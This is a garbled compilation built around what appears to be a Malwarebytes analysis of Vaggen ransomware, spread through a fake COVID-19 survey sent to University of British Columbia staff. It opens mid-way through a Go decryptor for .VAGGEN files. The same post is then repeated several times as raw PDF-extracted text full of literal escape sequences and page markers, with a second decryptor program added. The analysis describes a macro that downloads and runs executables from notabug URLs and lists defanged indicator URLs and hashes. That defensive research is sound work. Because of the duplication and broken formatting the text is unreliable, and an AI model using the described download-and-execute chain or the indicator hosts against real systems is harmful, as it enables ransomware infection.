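	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Values from the analysis above: a 32-byte key (AES-256) and Go's default GCM sizes.
const (
	vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"
	vaggenExt = ".VAGGEN"
	nonceSize = 12
	tagSize   = 16
)

func newGCM() cipher.AEAD {
	block, err := aes.NewCipher([]byte(vaggenKey))
	if err != nil {
		panic(err) // unreachable: the key is a fixed 32-byte constant
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		panic(err)
	}
	return gcm
}

// ParseVaggen splits a .VAGGEN blob into nonce || ciphertext || GCM tag.
func ParseVaggen(blob []byte) (nonce, ciphertext, tag []byte, err error) {
	if len(blob) < nonceSize+tagSize {
		return nil, nil, nil, fmt.Errorf("vaggen: %d bytes is shorter than nonce+tag", len(blob))
	}
	return blob[:nonceSize], blob[nonceSize : len(blob)-tagSize], blob[len(blob)-tagSize:], nil
}

// DecryptVaggen recovers the plaintext. gcm.Open consumes ciphertext||tag (the whole
// tail after the nonce) and verifies the tag, so truncated or modified files are rejected.
func DecryptVaggen(blob []byte) ([]byte, error) {
	nonce, _, _, err := ParseVaggen(blob)
	if err != nil {
		return nil, err
	}
	plain, err := newGCM().Open(nil, nonce, blob[nonceSize:], nil)
	if err != nil {
		return nil, fmt.Errorf("vaggen: tag check failed, file truncated or modified: %w", err)
	}
	return plain, nil
}

// RecoverFile decrypts <name>.VAGGEN and writes the plaintext to <name>,
// leaving the encrypted copy in place for forensics.
func RecoverFile(path string) (string, error) {
	if !strings.HasSuffix(path, vaggenExt) {
		return "", fmt.Errorf("vaggen: %s lacks the %s extension", path, vaggenExt)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggen(blob)
	if err != nil {
		return "", err
	}
	out := strings.TrimSuffix(path, vaggenExt)
	return out, os.WriteFile(out, plain, 0o600)
}

// EncryptVaggen is a constructed helper so the example runs offline. It lays a blob out
// as the post describes (random nonce, then gcm.Seal output); crypto/rand replaces CryptGenRandom.
func EncryptVaggen(plain []byte) ([]byte, error) {
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to its first argument, giving nonce||ciphertext||tag.
	return newGCM().Seal(nonce, nonce, plain, nil), nil
}

func main() {
	dir, _ := os.MkdirTemp("", "vaggen-demo")
	defer os.RemoveAll(dir)
	blob, _ := EncryptVaggen([]byte("constructed sample document\n"))
	enc := filepath.Join(dir, "notes.txt"+vaggenExt)
	if err := os.WriteFile(enc, blob, 0o600); err != nil {
		panic(err)
	}
	out, err := RecoverFile(enc)
	if err != nil {
		panic(err)
	}
	plain, _ := os.ReadFile(out)
	fmt.Printf("recovered %s: %q\n", filepath.Base(out), plain)
}
```

A tag failure on a real sample means the file was not produced with this key (a different build or variant) or has been damaged, so the recovery tool should report it rather than write output.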
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 855 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 856 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 857 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 858 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 859 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 860 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 861 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 862 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 863 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 864 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 865 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

1. Gets the %APPDATA% directory
2. Creates the Byxor directory in %APPDATA%
3. Downloads a file from the following URL and writes it as Polisen.exe:
   notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
4. Downloads a file from the following URL and writes it as Killar.exe:
   notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
5. Calls the Shell function to execute killar.exe
6. Checks the return value of the Shell function to see whether the launch succeeded (on success, the return value is the task ID of the executed application)
7. If successful, it sends a GET HTTP request to:
   canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
8. If it isn’t successful, it sends a GET HTTP request to:
   canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.

This can be very useful as an early warning notification system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The names of the main ones can be mapped as follows:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go library function path/filepath.Walk.

Files are encrypted with AES-256 (32 byte long key) in GCM mode.

The encryption algorithm is similar to the one demonstrated here.
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:
- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
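The .VAGGEN layout described in the Vaggen ransomware section (12-byte nonce, then the ciphertext, then the 16-byte GCM tag, under AES-256 with the hardcoded key quoted there) is all a recovery tool needs. The Go program below is an added example written for this page, not the Malwarebytes team's tool or the malware's own code; BuildFixture and the sample plaintext are constructed only so the decryptor can be exercised offline, and the key string is the one quoted in the post.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"strings"
)

// VaggenKey is the 32-byte AES-256 key quoted in the post. Because it is
// hardcoded in the sample, every .VAGGEN file can be opened with it.
const VaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // nonce stored at the start of each .VAGGEN file
	tagSize   = 16 // GCM tag that gcm.Seal appends after the ciphertext
	vaggenExt = ".VAGGEN"
)

// newGCM builds the AES-256-GCM AEAD; the key must be exactly 32 bytes.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // standard 12-byte nonce, 16-byte tag
}

// DecryptVaggen reverses the layout the post describes: nonce || ciphertext || tag.
// gcm.Open consumes ciphertext||tag as one slice, so only the nonce is split off.
// A wrong key, a truncated file or a flipped byte fails the tag check and yields
// an error rather than garbage, so a bad guess never overwrites good data.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
	if err != nil {
		return nil, fmt.Errorf("authentication failed (wrong key or damaged file): %w", err)
	}
	return plain, nil
}

// BuildFixture is a constructed test helper (not the malware's code) that writes
// a blob in the same layout so the decryptor can be exercised offline.
func BuildFixture(plain, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plain, nil), nil // nonce || ct || tag
}

// RecoverFile decrypts one .VAGGEN file and writes the plaintext beside it under
// the original name. The encrypted copy is kept so nothing is lost on a failure.
func RecoverFile(name string, key []byte) (string, error) {
	if !strings.HasSuffix(name, vaggenExt) {
		return "", fmt.Errorf("%s does not carry the %s extension", name, vaggenExt)
	}
	blob, err := os.ReadFile(name)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggen(blob, key)
	if err != nil {
		return "", err
	}
	out := strings.TrimSuffix(name, vaggenExt)
	if err := os.WriteFile(out, plain, 0600); err != nil {
		return "", err
	}
	return out, nil
}

func main() {
	for _, name := range os.Args[1:] { // usage: go run . file1.VAGGEN file2.VAGGEN
		if out, err := RecoverFile(name, []byte(VaggenKey)); err != nil {
			fmt.Fprintf(os.Stderr, "%s: %v\n", name, err)
		} else {
			fmt.Println("recovered", out)
		}
	}
}
```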
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 890 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 891 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 892 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 893 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 894 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 895 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 896 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 897 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 898 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
